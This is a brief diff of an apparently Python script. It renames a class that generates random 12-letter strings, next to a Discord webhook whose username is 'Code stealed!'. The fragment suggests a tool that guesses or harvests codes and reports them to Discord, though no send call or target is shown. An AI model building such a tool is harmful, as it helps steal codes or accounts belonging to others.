@@ -9,7 +9,7 @@ webhook = DiscordWebhook(
     username="Code stealed!"
     )
 completed = False
-class String():
+class Strings():
     def generate(l):
         global completed
         data_name = "".join(random.choices(string.ascii_letters, k=12))
